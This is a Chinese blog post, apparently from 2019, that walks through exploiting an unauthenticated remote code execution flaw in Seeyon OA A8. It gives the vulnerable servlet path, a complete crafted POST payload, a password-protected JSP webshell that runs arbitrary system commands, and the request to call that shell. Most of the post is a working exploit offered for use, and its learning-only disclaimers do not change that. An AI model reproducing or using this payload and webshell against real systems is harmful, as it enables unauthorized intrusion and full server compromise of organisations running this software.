致远OA系统远程命令代码执行漏洞 - Kirin博客

致远OA系统远程命令代码执行漏洞

作者: Bee

全网最全的网络资源分享网站

标签:

漏洞渗透

特别声明:部分文章为网络转载,资源使用一般不提供任何帮助,特殊资源除外,如有侵权请联系站长!请勿违法!本站文章仅供学习了解!技术无罪!

kirin博客 1.致远OA A8无需认证代码执行漏洞
网站地址:http://127.0.0.1:8088/seeyon/index.jsp
因为不方便透露漏洞网址,就用127.0.0.1代替。网站页面如下↓↓↓致远OA系统远程命令代码执行漏洞
2.
接下来用:/seeyon/htmlofficeservlet
来访问。http://127.0.0.1:8088/seeyon/htmlofficeservlet
如果出现了
DBSTEP V3.0 0 21 0 htmoffice operate err
哪就证明可能漏洞是存在的
致远OA系统远程命令代码执行漏洞
3.
然后我们打开burp,需要POST一个shell上去.如何抓包就不说了。
致远OA系统远程命令代码执行漏洞致远OA系统远程命令代码执行漏洞致远OA系统远程命令代码执行漏洞

然后点Go
4.
然后复制下面的jsp木马到POST包里面如图
DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("

“+excuteCmd(request.getParameter(“cmd”)) + “

“);}else{out.println(“:-)”);}%>6e4f045d4b8506bf492ada7e3390d7ce

致远OA系统远程命令代码执行漏洞
致远OA系统远程命令代码执行漏洞
5.
上面成功插入了jsp一句话木马接下来如下。致远OA系统远程命令代码执行漏洞
默认文件名是:test123456
然后访问网站
http://127.0.0.1:8088/seeyon/test.jsp致远OA系统远程命令代码执行漏洞
6.
然后运行以下代码
/seeyon/test.jsp?pwd=asasd3344&cmd=whoami
完整如这>>> http://127.0.0.1:8088/seeyon/test.jsp?pwd=asasd3344&cmd=whoami致远OA系统远程命令代码执行漏洞
运行成功
administrator权限能干什么就不用多说了吧
请勿进行违法操作
本文最后更新于2019-6-26,已超过 1 年没有更新,如果文章内容或图片资源失效,请留言反馈,我们会及时处理,谢谢!
分享到:
加入交流群
未经允许不得转载:

作者: Bee, 转载或复制请以 超链接形式 并注明出处 Kirin博客
原文地址: 《致远OA系统远程命令代码执行漏洞》 发布于2019-6-26

切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册

觉得文章有用就加入交流群吧

QQ扫一扫